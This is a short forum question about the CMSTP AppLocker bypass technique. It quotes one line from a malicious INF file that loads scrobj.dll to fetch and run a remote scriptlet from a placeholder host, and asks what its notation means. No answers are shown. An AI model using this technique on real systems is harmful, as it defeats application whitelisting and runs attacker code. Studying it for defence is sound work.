1

A lot of literature suggests that CMSTP can be used for AppLocker bypass by making use of a malicious INF file which can fetch and run a malicious sct file which can in turn run arbitrary code. (https://twitter.com/NickTyrer/status/958450014111633408).

I didnt understand one line in the malicious INF file under [UnRegisterOCXSection]:

%11%\scrobj.dll,NI,https://<myip>/malicious.sct

Can someone please explain what is %11% notation and what is NI argument to scrobj.dll?

user1004985
  • 173
  • 5

0 Answers0